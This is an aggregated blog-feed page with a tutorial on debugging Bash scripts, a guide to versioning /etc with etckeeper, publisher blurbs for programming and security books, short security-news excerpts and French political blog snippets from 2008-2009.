    $ ./your-program.py --logging-level=debug --logging-file=debug.log
    

    Twitter Facebook Google Buzz Reddit Hacker News StumbleUpon Digg Delicious

    Read the comments on this post.

    Tue 25 August, 2009

    Channel Image00:48 How to Debug Bash Scripts » Ayman Hourieh | Blog Feed

    Bash is the default scripting language in most Linux systems. Its usage ranges from an interactive command interpreter to a scripting language for writing complex programs. Debugging facilities are a standard feature of compilers and interpreters, and bash is no different in this regard. In this article, I will explain various techniques and tips for debugging Bash scripts.

    Tracing script execution

    You can instruct Bash to print debugging output as it interprets you scripts. When running in this mode, Bash prints commands and their arguments before they are executed.

    To see how this works, let's try it on an example script. The following simple script greets the user and prints the current date:

    #!/bin/bash
    echo "Hello $USER,"
    echo "Today is $(date +'%Y-%m-%d')"
    

    To trace the execution of the script, use bash -x to run it:

    $ bash -x example_script.sh
    + echo 'Hello ayman,'
    Hello ayman,
    ++ date +%Y-%m-%d
    + echo 'Today is 2009-08-24'
    Today is 2009-08-24
    

    In this mode, Bash prints each command (with its expanded arguments) before executing it. Debugging output is prefixed with a number of + signs to indicate nesting. This output helps you see exactly what the script is doing, and understand why it is not behaving as expected.

    Adding line numbers to tracing output

    In large scripts, it may be helpful to prefix this debugging output with the script name, line number and function name. You can do this by setting the following environment variable:

    export PS4='+${BASH_SOURCE}:${LINENO}:${FUNCNAME[0]}: '
    

    Let's trace our example script again to see the new debugging output:

    $ bash -x example_script.sh
    +example_script.sh:2:: echo 'Hello ayman,'
    Hello ayman,
    ++example_script.sh:3:: date +%Y-%m-%d
    +example_script.sh:3:: echo 'Today is 2009-08-24'
    Today is 2009-08-24
    

    Tracing part of a script

    Sometimes, you are only interested in tracing one part of your script. This can be done by calling set -x where you want to enable tracing, and calling set +x to disable it. Let's apply this to our example script:

    #!/bin/bash
    echo "Hello $USER,"
    set -x
    echo "Today is $(date %Y-%m-%d)"
    set +x
    

    Now, let's run the script:

    $ ./example_script.sh
    Hello ayman,
    ++example_script.sh:4:: date +%Y-%m-%d
    +example_script.sh:4:: echo 'Today is 2009-08-24'
    Today is 2009-08-24
    +example_script.sh:5:: set +x
    

    Notice that we no longer need to run the script with bash -x.

    Logging

    Tracing script execution is sometimes too verbose, especially if you are only interested in a limited number of events, like calling a certain function or entering a certain loop. In this case, it's better to log the events you are interested in. Logging can be achieved with something as simple as a function that prints a string to stderr:

    _log() {
      if [ "$_DEBUG" == "true" ]; then
        echo 1>&2 "$@"
      fi
    }
    

    Now you can embed logging messages into your script by calling this function:

    _log "Copying files..."
    cp src/* dst/
    

    Log messages are printed only if the _DEBUG variable is set to true. This allows you to toggle the printing of log messages depending on your needs. You don't need to modify your script in order to change this variable; you can set it on the command line:

    $ _DEBUG=true ./example_script.sh
    

    Using the Bash debugger

    If you are writing a complex script and you need a full-fledged debugger to debug it, then you can use bashdb, the Bash debugger. The debugger contains all the features that you would expect, like breakpoints, stepping in and out of functions, and attaching to running scripts. Its interface is a bit similar to gdb. You can read the documentation of bashdb for more information.

    Twitter Facebook Google Buzz Reddit Hacker News StumbleUpon Digg Delicious

    Read the comments on this post.

    Sun 16 August, 2009

    Channel Image20:01 Version Control for Linux Configuration (/etc) with etckeeper » Ayman Hourieh | Blog Feed

    Keeping a version history of files under /etc is essential for maintaining a healthy system. The benefits of tracking changes to /etc include:

    • Documentation: The log messages that are attached to configuration changes serve as documentation. These log messages record who made the change, when and why. Understanding the contents of a config file becomes much easier if you have a full history of the changes that were made to this file.
    • Troubleshooting: Misconfiguration can result in a variety of problems. When a service starts to misbehave, one of the things you can do to troubleshoot the issue is to check the version history of its config file. There, you can see if any changes were made around the time frame in which the problem happened. If you spot a change that may be causing the issue, you can easily revert it to fix the problem.

    You can set up your own repository to track changes to /etc, or you can use a tool called etckeeper to handle the setup for you. This tool supports multiple version control systems, including Git, Mercurial and Bazaar. It integrates with the package management systems of a number of Linux distros, including APT (used by Debian, Ubuntu), YUM (RedHat, CentOS, Fedora), Pacman (Arch Linux). Using etckeeper instead of rolling your own has some advantages:

    • etckeeper integration with package managers means than you don't need to manually commit changes in /etc after installing packages.
    • etckeeper comes pre-configured with a list of files that live in /etc but usually do not benefit from version control (like some cache files).

    Read on to learn how to install, configure and use etckeeper.

    Installing etckeeper

    To install etckeeper on Debian or Ubuntu, run:

    $ sudo apt-get install etckeeper
    

    If you use another Linux distro, search the packcage list in your package manager. If etckeeper supports your system, you will probably find it there. Otherwise, you can download the source from the official site of etckeeper.

    Configuring etckeeper

    Next, let's configure etckeeper. Open /etc/etckeeper/etckeeper.conf in your favorite editor. The first option that you need to look at is VCS, which is the version control system you want to use. By default it's set to git, but you can change it to hg or bzr depending on your preference. I use git myself, but most of this article should apply to etckeeper regardless of the version control system you choose.

    Another option that I recommend looking at is AVOID_COMMIT_BEFORE_INSTALL. By default, etckeeper will automatically commit any pending changes when you install packages. I find this behavior undesirable, as it may commit unfinished changes. I disable it by setting AVOID_COMMIT_BEFORE_INSTALL to 1.

    If you installed etckeeper from source, have a look at HIGHLEVEL_PACKAGE_MANAGER and LOWLEVEL_PACKAGE_MANAGER and change them depending on the package manager of your system.

    Using etckeeper

    With this, we are done with configuring etckeeper. Let's create a repository now:

    $ cd /etc
    $ sudo etckeeper init
    $ sudo etckeeper commit "Initial import"
    

    This will create an empty repository and then commit the contents of your /etc directory to it.

    From here, using etckeeper is not different from using the version control system you selected. Let's say you want to change your MySQL config; you can edit the file and then commit it as usual:

    $ cd /etc
    $ sudo vi /etc/mysql/my.cnf
    $ sudo git commit -m "Commit message"
    

    Tips

    • Always keep your changes atomic. Don't commit two unrelated changes in one commit. This will make your live easier later if you need to quickly revert a misconfigured file.
    • Write descriptive commit messages. One of the main reasons for using a version control system is knowing why a change was made.
    • If you need to install a package in the middle of a change to /etc, you need to record the change and revert to a clean state, install the package, and apply your recorded change again. In git, this is done like this:

      $ cd /etc
      $ sudo vi mysql/my.cnf    # Make a change.
      $ sudo git stash          # Record the change and revert to a clean state.
      $ sudo apt-get install bc # Install a package.
      $ sudo git stash apply    # Apply the recorded change.
      

    See the man page of git-stash for more information.

    Twitter Facebook Google Buzz Reddit Hacker News StumbleUpon Digg Delicious

    Read the comments on this post.

    Tue 11 August, 2009

    Channel Image12:01 Operating Systems seen on an African Network Telescope» Static in the Ether » Security
    I have been processing some of my network telescope data collected over the last four and a bit years. During this time I have classified a little over 3.2 million IP addresses by operating system making use of p0f The results after the latest updates are: OS Family % Windows 98.84258 Linux 0.811703 FreeBSD 0.170989 [...]

    Mon 10 August, 2009

    Channel Image01:46 Visualizing Data: Exploring and Explaining Data with the Processing Environment» SecGuru -

    Enormous quantities of data go unused or underused today, simply because people can't visualize the quantities and relationships in it. Using a downloadable programming environment developed by the author, Visualizing Data demonstrates methods for representing data accurately on the Web and elsewhere, complete with user interaction, animation, and more. How do the 3.1 billion A, C, G and T letters of the human genome compare to those of a chimp or a mouse? What do the paths that millions of visitors take through a web site look like? With Visualizing Data, you learn how to answer complex questions like these with thoroughly interactive displays. We're not talking about cookie-cutter charts and graphs. This book teaches you how to design entire interfaces around large, complex data sets with the help of a powerful new design and prototyping tool called "Processing." Used by many researchers and companies to convey specific data in a clear and understandable manner, the Processing beta is available free. With this tool and Visualizing Data as a guide, you'll learn basic visualization principles, how to choose the right kind of display for your purposes, and how to provide interactive features that will bring users to your site over and over. This book teaches you: The seven stages of visualizing data -- acquire, parse, filter, mine, represent, refine, and interact How all data problems begin with a question and end with a narrative construct that provides a clear answer without extraneous details Several example projects with the code to make them work Positive and negative points of each representation discussed. The focus is on customization so that each one best suits what you want toconvey about your data set The book does not provide ready-made "visualizations" that can be plugged into any data set. Instead, with chapters divided by types of data rather than types of display, you'll learn how each visualization conveys the unique properties of the data it represents -- why the data was collected, what's interesting about it, and what stories it can tell. Visualizing Data teaches you how to answer questions, not simply display information.


    Channel Image01:44 iPhone Forensics: Recovering Evidence, Personal Data, and Corporate Assets» SecGuru -

    "This book is a must for anyone attempting to examine the iPhone. The level of forensic detail is excellent. If only all guides to forensics were written with this clarity!" -Andrew Sheldon, Director of Evidence Talks, computer forensics experts With iPhone use increasing in business networks, IT and security professionals face a serious challenge: these devices store an enormous amount of information. If your staff conducts business with an iPhone, you need to know how to recover, analyze, and securely destroy sensitive data. iPhone Forensics supplies the knowledge necessary to conduct complete and highly specialized forensic analysis of the iPhone, iPhone 3G, and iPod Touch. This book helps you: Determine what type of data is stored on the device Break v1.x and v2.x passcode-protected iPhones to gain access to the device Build a custom recovery toolkit for the iPhone Interrupt iPhone 3G's "secure wipe" process Conduct data recovery of a v1.x and v2.x iPhone user disk partition, and preserve and recover the entire raw user disk partition Recover deleted voicemail, images, email, and other personal data, using data carving techniques Recover geotagged metadata from camera photos Discover Google map lookups, typing cache, and other data stored on the live file system Extract contact information from the iPhone's database Use different recovery strategies based on case needs And more. iPhone Forensics includes techniques used by more than 200 law enforcement agencies worldwide, and is a must-have for any corporate compliance and disaster recovery plan.


    Channel Image01:37 Metasploit Toolkit for Penetration Testing, Exploit Development, and Vulnerability Research» SecGuru -

    This is the first book available for the Metasploit Framework (MSF), which is the attack platform of choice for one of the fastest growing careers in IT security: Penetration Testing. The book and companion Web site will provide professional penetration testers and security researchers with a fully integrated suite of tools for discovering, running, and testing exploit code.This book discusses how to use the Metasploit Framework (MSF) as an exploitation platform. The book begins with a detailed discussion of the three MSF interfaces: msfweb, msfconsole, and msfcli .This chapter demonstrates all of the features offered by the MSF as an exploitation platform. With a solid understanding of MSF's capabilities, the book then details techniques for dramatically reducing the amount of time required for developing functional exploits.By working through a real-world vulnerabilities against popular closed source applications, the reader will learn how to use the tools and MSF to quickly build reliable attacks as standalone exploits. The section will also explain how to integrate an exploit directly into the Metasploit Framework by providing a line-by-line analysis of an integrated exploit module. Details as to how the Metasploit engine drives the behind-the-scenes exploitation process will be covered, and along the way the reader will come to understand the advantages of exploitation frameworks. The final section of the book examines the Meterpreter payload system and teaches readers to develop completely new extensions that will integrate fluidly with the Metasploit Framework. · A November 2004 survey conducted by "CSO Magazine" stated that 42% of chief security officers considered penetration testing to be a security priority for their organizations· The Metasploit Framework is the most popular open source exploit platform, and there are no competing books· The book's companion Web site offers all of the working code and exploits contained within the book


    Channel Image01:34 Core Python Programming (Prentice Hall Ptr Core Series)» SecGuru -

    A quick guide to everything anyone would want to know about the soaringly popular Internet programming language, Python. Provides an introduction to new features introduced in Python 1.6, and topics covered include regular expressions, extending Python, and OOP. The CD-ROM includes the source code for all of the examples in the text. Softcover.


    Channel Image01:33 Programming Perl» SecGuru -

    Coauthored by Larry Wall, the creator of Perl, this book is the authoritative guide to Perl version 5, the scripting utility now established as the programming tool of choice for the World Wide Web, UNIX system administration, and a vast range of other applications. Learn how to use this versatile cross-platform programming language to solve unique programming challenges. This heavily revised second edition of Programming Perl contains a full explanation of Perl version 5.003 features. It covers Perl language and syntax, functions, library modules, references, and object-oriented features. It also explores invocation options for Perl and the utilities that come with it, debugging, common mistakes, efficiency, programming style, distribution and installation of Perl, and much more. Reviewers have called this book splendid, definitive, and well worth the price.


    Channel Image01:31 Pro Drupal Development» SecGuru -

    Pro Drupal Development is strongly recommended for any PHP programmer who wants a truly in-depth look at how Drupal works and how to make the most of it. — Michael J. Ross, Web developer/Slashdot contributor Drupal is one of the most popular content management systems in use today. With it, you can create a variety of community-driven sites, including blogs, forums, wiki-style sites, and much more. Pro Drupal Development was written to arm you with knowledge to customize your Drupal installation however you see fit. The book assumes that you already possess the knowledge to install and bring a standard installation online. Then authors John VanDyk and Matt Westgate delve into Drupal internals, showing you how to truly take advantage of its powerful architecture. Youll learn how to create your own modules, develop your own themes, and produce your own filters. You'll learn the inner workings of each key part of Drupal, including user management, sessions, the node system, caching, and the various APIs available to you. Of course, your Drupal-powered site isnt effective until you can efficiently serve pages to your visitors. As such, the authors have included the information you need to optimize your Drupal installation to perform well under high-load situations. Also featured is information on Drupal security and best practices, as well as integration of Ajax and the internationalization of your Drupal web site. Simply put, if you are working with Drupal at all, then you need this book.

    • This book is written by Drupal core developers.
    • Drupal architecture and behavior are mapped out visually.
    • Common pitfalls are identified and addressed.
    • Chapters provide regular discussion and reference to why things work they way they do, not just how.
    • The front matter features a foreword by Dries Buytaert, Drupal founder.


    Channel Image01:29 Python (Visual QuickStart Guide)» SecGuru -

    UntitledNamed after the Monty Python comedy troupe, Python is an interpreted, open-source, object-oriented programming language. It's also free and runs portably on Windows, Mac OS, Unix, and other operating systems. Python can be used for all manner of programming tasks, from CGI scripts to full-fledged applications. It is gaining popularity among programmers in part because it is easier to read (and hence, debug) than most other programming languages, and it's generally simpler to install, learn, and use. Its line structure forces consistent indentation. Its syntax and semantics make it suitable for simple scripts and large programs. Its flexible data structures and dynamic typing allow you to get a lot done in a few lines. To learn it, you'll need is some basic programming experience and a copy of Python: Visual QuickStart Guide.In patented Visual QuickStart Guide fashion, the book doesn't just tell you how to use Python to develop applications, it shows you, breaking Python into easy-to-digest, step-by-step tasks and providing example code. Python: Visual QuickStart Guide emphasizes the core language and libraries, which are the building blocks for programs. Author Chris Fehily starts with the basics - expressions, statements, numbers, strings - then moves on to lists, dictionaries, functions, and modules before wrapping things up with straightforward discussions of exceptions and classes. Some additional topics covered include:- Object-oriented programming- Working in multiple operating systems- Structuring large programs- Comparing Python to C, Perl, and Java- Handling errors gracefully.


    Channel Image01:17 Algorithms and Models for the Web-Graph: 6th International Workshop, WAW 2009 Barcelona, Spain, February 12-13, 2009,» SecGuru -

    This book constitutes the refereed proceedings of the 6th International Workshop on Algorithms and Models for the Web-Graph, WAW 2009, held in Barcelona, Spain, in February 2009 - co-located with WSDM 2009, the Second ACM International Conference on Web Search and Data Mining.The 14 revised full papers presented were carefully reviewed and selected from numerous submissions for inclusion in the book. The papers address a wide variety of topics related to the study of the Web-graph such as theoretical and empirical analysis of the Web graph and Web 2.0 graphs, random walks on the Web and Web 2.0 graphs and their applications, and design and performance evaluation of the algorithms for social networks. The workshop papers have been naturally clustered in three topical sections on graph models for complex networks, pagerank and Web graph, and social networks and search.


    Channel Image01:15 MySQL Stored Procedure Programming» SecGuru -

    The implementation of stored procedures in MySQL 5.0 a huge milestone -- one that is expected to lead to widespread enterprise adoption of the already extremely popular MySQL database. If you are serious about building the web-based database applications of the future, you need to get up to speed quickly on how stored procedures work -- and how to build them the right way. This book, destined to be the bible of stored procedure development, is a resource that no real MySQL programmer can afford to do without. In the decade since MySQL burst on the scene, it has become the dominant open source database, with capabilities and performance rivaling those of commercial RDBMS offerings like Oracle and SQL Server. Along with Linux and PHP, MySQL is at the heart of millions of applications. And now, with support for stored procedures, functions, and triggers in MySQL 5.0, MySQL offers the programming power needed for true enterprise use. MySQL's new procedural language has a straightforward syntax, making it easy to write simple programs. But it's not so easy to write secure, easily maintained, high-performance, and bug-free programs. Few in the MySQL world have substantial experience yet with stored procedures, but Guy Harrison and Steven Feuerstein have decades of combined expertise. In "MySQL Stored Procedure Programming," they put that hard-won experience to good use. Packed with code examples and covering everything from language basics to application building to advanced tuning and best practices, this highly readable book is the one-stop guide to MySQL development. It consists of four majorsections: MySQL stored programming fundamentals -- tutorial, basic statements, SQL in stored programs, and error handling Building MySQL stored programs -- transaction handling, built-in functions, stored functions, and triggers MySQL stored programs in applications -- using stored programs with PHP, Java, Perl, Python, and .NET (C# and VB.NET) Optimizing MySQL stored programs -- security, basic and advanced SQL tuning, optimizing stored program code, and programming best practices A companion web site contains many thousands of lines of code, that you can put to use immediately. Guy Harrison is Chief Architect of Database Solutions at Quest Software and a frequent speaker and writer on MySQL topics. Steven Feuerstein is the author of "Oracle PL/SQL Programming," the classic reference for Oracle stored programming for more than ten years. Both have decades of experience as database developers, and between them they have authored a dozen books.


    Channel Image01:14 MySQL Database Design and Tuning (Developer's Library)» SecGuru -

    The authoritative, hands-on guide to advanced MySQL programming and administration techniques for high performance is here. MySQL Database Design and Tuning is the only guide with coverage of both the basics and advanced topics, including reliability, performance, optimization and tuning for MySQL. This clear, concise and unique source for the most reliable MySQL performance information will show you how to:

    • Deploy the right MySQL product for your performance needs.
    • Set up a performance management and monitoring environment using tools from MySQL.
    • Implement the right indexing strategy
    • Apply good performance strategy when developing software to work with the MySQL database.
    • Configure dozens of variable to correctly tune the MySQL engine.
    If you deal with the intricacies and challenges of advanced MySQL functionality on a daily basis, you will be able to build on your knowledge with author Robert Schneider's real-world experiences in MySQL Database Design and Tuning.


    Wed 01 July, 2009

    Channel Image01:20 Converting Internet Barometer Data» Static in the Ether » Security
    My first foray into the tag soup that is  XSL and XSLT has been to turn the XML outputs from the InterNet Barometer System as discussed previously into plain text output which I can use more easily for comparing with some of my other data sources. While A cursory browse cannot find any Terms & [...]

    Tue 30 June, 2009

    Channel Image10:16 Internet Attack Barometer» Static in the Ether » Security
    Interoute has launched a new online Internet Barometer detailing attacks as observed from their 22 monitoring stations across the European portion of the Internet. The site provides rich graph and chart interfaces, which are nicely interactive.  There are definatley some ideas I want to incorporate form this into my own Network Telescope management console.  It [...]

    Wed 24 June, 2009

    Channel Image18:39 12 Things You THOUGHT Were Bad for You…» The Best Article Every day
    Written by Jeryl Brunner Turns out, your guilty pleasures (red wine, video games) may not be so guilty after all. And those pesky side effects of being an adult-stress, anyone?-can actually benefit you too. Read on to learn the positives of your seemingly negative habits. Say Yes to Stress As long as stress doesn’t completely overtake you [...]

    Sun 21 June, 2009

    Channel Image16:21 Hosted Exchange and Hosted Sharepoint» Linux Exposed
    Now available! Secure Hosted Exchange (http://www.consultplanet.nl/producten/email_services/managed_hosted_exchange.php) and Hosted Sharepoint (http://www.consultplanet.nl/producten/hosted_sharepoint/) solutions from our partner ConsultPlanet. ConsultPlanet is the nr 1...

    Tue 16 June, 2009

    Channel Image01:56 Inspecting HTTP» Linux Exposed
    There are numerous reasons you might want to inspect HTTP when debugging a problem. If you've ever tried to debug...

    Mon 23 March, 2009

    Channel Image01:14 "Django 1.0 Website Development" Released » Ayman Hourieh | Blog Feed

    My author copies of "Django 1.0 Website Development" have arrived. This is the second edition of my Django book. Django is a framework for building web applications in Python. This book explains how to assemble Django's features and take advantage of its power to design, develop, and deploy a fully-featured web site.

    Django 1.0 Website Development

    The new edition has been updated to Django 1.0. The key topics that the reader will learn from the book are:

    • Register users through a user authentication system and manage them efficiently.
    • Restrict user access to certain pages and protect against malicious input.
    • Create tags to allow site visitors to classify, view, and share content easily.
    • Create own administration interface for proper monitoring of the web site.
    • Enhance user interface with AJAX.
    • Enable voting and commenting on content, and display popular content to site visitors.
    • Build user networks; add friend management and invitation features for social networking.
    • Create unit tests to automate the testing of code.

    The full table of contents is available.

    The book is available in paper and PDF formats at Packt Publishing. It is also available from all major book sellers like Amazon.

    Writing the book and revising it have been an enjoyable experience for me. The feeling of accomplishment when my copies arrived is satisfying. I sincerely hope that readers find the book interesting and useful. If you have questions or comments, don't hesitate to email me!

    More photos of the book are available at my Picasa web albums.

    Twitter Facebook Google Buzz Reddit Hacker News StumbleUpon Digg Delicious

    Read the comments on this post.

    Fri 13 March, 2009

    Channel Image09:01 CFP: Information Security for South Africa 2009» Static in the Ether » Security
    The Second call for papers ISSA2009, Information Security for South Africa, 6 – 8 July 2009 has been released. http://www.infosecsa.co.za Due dates: Abstract submission: 23 March 2009 (1 page) Notification of abstract acceptance: 31 March 2009 Full papers submission for review: 18 April 2009 Notification of acceptance: 26 May 2009 Submission of final camera-ready papers: [...]

    Sat 28 February, 2009

    Channel Image13:47 Ce que vous ne lirez plus ici / mise à jour RSS / mes 2 nouveaux blogs» rewriting.net
    L’an passé, j’étais tout fier : j’ouvrais tous les matins les portes du Monde(.fr). Je devais certes me réveiller à 4h du matin, mais je prenais aussi mon pied à effectuer une revue de presse internationale pour le journal le plus lu de l’internet francophone. Cette année, LeMonde.fr me propose de « surveiller les surveillants« , et [...]

    Wed 11 February, 2009

    Channel Image07:03 Zone-H got owned» Static in the Ether » Security
    While trying to follow up on the quite widely publicised Kaspersky website hack I went along to the obvious spot of Zone-h. Having it uncontactable the last two days, I tried again this morning and got the following: Zone-H defaced No Details on this as yet. Hackers blog has more on the Kaspersky hack which [...]

    Sat 31 January, 2009

    Channel Image19:24 Direct Matin m’a censuré, et Le Monde avec» rewriting.net
    Ce mercredi 28 janvier 2009, j’étais interviewé par un journaliste du Monde qui préparait, pour Direct Matin Plus (Le Monde y possède 30 %), un article au sujet des problèmes posés par le « passe » Navigo. Le lendemain, Direct Matin Plus censurait l’article, au profit d’une jolie page colorée de publicité. La preuve : Ce qui [...]

    Mon 05 January, 2009

    Channel Image16:38 Travailler moins pour gagner plus ? (la télé de la Brosse à Sarkozy – III)» rewriting.net
    C’est la troisième fois, en deux mois, que ce que j’écris semble avoir un impact direct sur des sites web du gouvernement. Le mois dernier, la préfecture de l’Isère a ainsi retiré de son site web le formulaire d’incitation à la délation dont j’avais causé une dizaine de jours auparavant. Puis c’était au tour du [...]

    Thu 01 January, 2009

    Channel Image10:49 Roundup of Security predictions for 2009» Static in the Ether » Security
    Robert Auger of Webappsec.org has compiled a good roundup of various security predictions for 2009, as various sites are want to do at this time of year. ComputerWorld – Opinion: Security predictions for 2009 SANS – 2009 Security Predictions ITWorld – Security predictions for 2009 CRN – 10 Security Predictions For 2009 Gartner – The [...]

    Sun 21 December, 2008

    Channel Image11:20 Ce Vendredi durera 3 semaines (profitez-en !)» rewriting.net
    Dites, ce n° de Vendredi est un peu spécial. Parce qu’on voulait prendre des vacances, on a fait les choses en grand, avec un n° double (16 pages, pour 2€), avec : un guide des 101 sites « pour s’informer » (et un mode d’emploi - »pour les nuls« - afin d’aider vos belles/grands mères-pères à s’initier aux joies [...]

    Wed 17 December, 2008

    Channel Image22:28 Choosing your Computer Security Conference» Static in the Ether » Security
    While trawling through references, and chasing down files as part of my final PhD push, I came across a  resource compiled by Guofei Gu at Texas A&M. He has provided a Computer Security Conference Ranking and Statistic page. While by his own admission it is somewhat subjective, he makes use of some interesting metrics. If you ahve novel [...]

    Tue 25 November, 2008

    Channel Image11:31 L’ex-futur ministre de la justice reconnaît son passé judiciaire sur Wikipedia» rewriting.net
    Patrick Devedjian est avocat, et il a défendu Jacques Chirac et Charles Pasqua. Il avait aussi été pressenti pour être le Garde des Sceaux de Nicolas Sarkozy, et serait de nouveau sur les rangs, à l’occasion du remaniement, et du départ de Rachida Dati. C’est aussi l’un des rares hommes politiques de ce pays à [...]

    Thu 20 November, 2008

    Channel Image14:19 J’ai reçu trois cartes électorales (« à gratter »), pour aller voter…» rewriting.net
    Ce 19 novembre, j’étais invité à voter, par internet, aux élections prudhommales. C’est la première fois que les prudhommes testent le vote électronique, à Paris, pour « renforcer la participation tombée en 2002 à 33% de votants parmi les salariés et 27 % chez les employeurs, en chute libre depuis 1979 où ils avaient été respectivement [...]

    Sun 16 November, 2008

    Channel Image15:46 Je ne suis pas terroriste… mais je me soigne» rewriting.net
    A défaut de preuves formelles, les policiers anti-terroristes ont trouvé « un manuel contenant des indications sur le comportement à adopter lors d’une garde à vue pour résister au mieux à la pression des policiers » lors de leurs perquisitions, dans l’affaire de la « mouvance anarcho-autonome« , qu’ils surveillaient depuis des mois (voir ce qu’en disait, en juin [...]

    Tue 04 November, 2008

    Channel Image18:07 Windows Hacking and Windows Security Site» Linux Exposed
    In a few months we will open a new website: Windows Exposed reachable at http://www.windowsexposed.com This new Hacking and...

    Fri 31 October, 2008

    Channel Image12:47 Présumés coupables : la faute à l’internet ?» rewriting.net
    De tout ce que j’ai pu lire sur la loi création et Internet, ce petit billet de Philippe Aigrain me paraît le plus pertinent : Je l’affirme depuis un an : la phase la plus scandaleuse, la plus attentatoire aux droits fondamentaux de la riposte graduée, c’est la première : celle de l’envoi automatique d’accusations [...]
    Channel Image11:45 Petits rejetons de la vidéosurveillance» rewriting.net
    Et si les caméras de vidéosurveillance étaient vivantes, perchées sur leurs promontoires, à couver leurs petits…? Source : The Village Petstore and Charcoal Grill, par Banksy via NotCot via BienBienBien : NOTCOT: Banksy’s Village Petstore & Charcoal Grill from Jean Aw on Vimeo.

    Wed 29 October, 2008

    Channel Image22:23 Fresh Phish – more on DNS and Kaminsky» Static in the Ether » Security
    The October 2008 Issue of IEEE Spectrum magazine has an nicely phrased piece title “Fresh Phish” by David Schneider describing the potential of the DNS spoofing bug Discovered by Kaminsky. Also worth noting is the focus on Steampunk [1] [2] [3] including a reference to Steampunk band Abney Park
    Channel Image11:13 Travailler plus pour ne gagner rien ? (la télé de la Brosse à Sarkozy – II)» rewriting.net
    Les images, c’est plus parlant quand elles défilent que quand on les entassent. Hier, je publiais un billet sur le modèle de webTV que François de la Brosse, le « papa » de toutes les télés de Sarkozy, se plaît à recopier/coller ici ou là, comme si tous ces sites se valaient, comme si TVSarko était partout. [...]

    Sat 25 October, 2008

    Channel Image08:14 Phishing on Phacebook ?» Static in the Ether » Security
    I came across the following on facebook while doing my monthly catchup on who is who in the zoo. Is it bad design to allow users to inject their own content like this ? In this case is more a case of a litmus test of the awareness of social networking users , in terms [...]

    Fri 24 October, 2008

    Channel Image08:48 New Infosec Viz Tool – Picviz» Static in the Ether » Security
    Version 0.3 of PicViz has been released, based on python and QT – which bodes well for potential portability. This is yet another tool to help one actually filter through piles of connections, using a classic parallel axis setup.  Drilldown is offered. Some example renderings of  the Kaminsky DNS attacks are available. A more advanced [...]
    Channel Image00:29 Next Great worm on the rise ? (MS08-067 Critical)» Static in the Ether » Security
    Microsoft seems to have broken with the “Patch Tuesday” scheduled release cycle with the urgent release of MS08-67 earlier today after having detected in the wild attacks against  netapi32.dll. The vulnerability is in the RPC connector we know and love so well ( Blaster, Welchia, Nimda …). ISC points out quite nicely that this could [...]

    Wed 15 October, 2008

    Channel Image10:57 Quiz: Specifying life time for a webpage» Palisade Magazine : Application Security Intelligence

    We have often come across the message “Webpage has expired” when attempting to access a recently accessed page. This message comes as a result of the web server specifying an expiration time for the webpage when it is stored on the browser’s cache. How does a web server specify the life time for a page to the browser’s cache?

    1. Using the Expires header
    2. Using the Max-age directive along with Expires header
    3. Setting the Must-Revalidate header in the response
    4. All of the above
    Channel Image10:42 SAP Baseline Security Audit» Palisade Magazine : Application Security Intelligence
    A SAP Baseline Security Audit tells enterprises how their SAP security posture stacks up against industry best practices. The Baseline Security Audit is the first step in a comprehensive security audit program and is ideal for generating a quick win early. This article outlines the areas covered under the SAP Baseline Security Audit we perform.
    Channel Image10:19 Defeating Encryption in Some Thick Clients» Palisade Magazine : Application Security Intelligence
    While testing thick client applications we sometimes encounter the client encrypting pieces of the request. At such times, many of our variable manipulation attacks are foiled. To overcome this barrier, there are several techniques. Here’s one of the methods we tried for a recent thick client application test.
    Channel Image10:04 Database Links Security» Palisade Magazine : Application Security Intelligence
    Database links (DBLinks in Oracle) are a technique for one database to connect to a remote database and execute queries. The originating database uses an account in the remote destination database to connect. This connection thus uses a username and password of an account in the destination database. The connection has the privileges of the account that’s used in the destination database.

    Mon 13 October, 2008

    Channel Image03:00 Cracking WPA and WPA2 passwords» Linux Exposed
    Elcomsoft's Distributed Password Recovery (EDPR) tool that can crack WPA and WPA2 passwords faster has caused concern among users and...

    Sat 11 October, 2008

    Channel Image01:27 Ilegal SEO techniques» Linux Exposed
    When an SEO professional tells you that he or she will secure incoming links for you, ask them to tell...

    Tue 02 September, 2008

    Channel Image11:26 Security and Networks Research Group (SNRG) Site launch» Static in the Ether » Security
    After some preparation and navigation of technical SNAFUs the new website for the Security and Networks research Group (SNRG) that I run in the Rhodes CS Department is up and running. While content is still a little thin on the ground, it does represent a major step forward in actually providing a point of collation [...]

    Mon 25 August, 2008

    Channel Image18:51 Verifying Smime content with openSSL» Static in the Ether » Security
    I had an interesting question posed ot me today by Dominic who asked me to verify whether his all new Digital certificate was correctly being used for signing mail. Thunderbird sadly complained that the signature was invalid, which was unexpected, and that the issuer was unknown ( expected since it comes form a private hierarchy.)  [...]
    Channel Image08:21 Points Transfer with CAcert» Static in the Ether » Security
    Having finally completed my points transfer from my Thawte web of Trust to CaCERT, I thought it would be worth documenting the process.  I am already  Thawte WOT notary, and as such a trusted and assured person in the sense of their Web of Trust. details of this migration process can be found here, although [...]

    Thu 21 August, 2008

    Channel Image08:54 Applied Security Visualization released» Static in the Ether » Security
    I probably should have posted this a while back but, its still worth noting that Raffael Marty’s Applied Security Visualization has been released, and includes a copy of the DAVIX CD as distributed at Defcon 16 (davix-1.0.1-defcon16.iso.gz – also obtainable from the homepage, includes a couple of packet traces as used in the Defcon workshop) [...]

    Wed 20 August, 2008

    Channel Image23:49 Blackhat 2008 Slides» Static in the Ether » Security
    Michael Boman has made available the slidepack for Blackhat 2008. There are many blackhats as such but THE Blackhat is Blackhat USA held in Vegas in early in August each year. While the official audio and video will be another couple of months off, the slides should keep people interested. BH Europe also has material [...]
    Channel Image23:29 Defcon16 Toolsets» Static in the Ether » Security
    With the 16th incarnation of Defcon having come and gone last week, a number of people have put together a nice list of the various tools released. The ZDnet’s Rob Fuller has done all the hard work of tracking down the various tools and their websites in his article -  entitled “ DEFCON 16: List [...]

    Tue 19 August, 2008

    Channel Image14:03 Wierdo comment spam» Static in the Ether » Security
    The last few weeks has seen a deluge of comment spam, which mostly is the run of the mill bot based stuff advertising ‘cheap hosting’ , porn and other such sites.  a couple tht cought my attention were simple posts of urls with the following sort of format: http://www.google.com/search?q=rxbcrobh http://www.google.com/search?q=frhlrxca http://www.google.com/search?q=omihinga Searching on google with [...]

    Thu 31 July, 2008

    Channel Image17:13 Firefox Summit 2008, Day 2 » Ayman Hourieh | Blog Feed

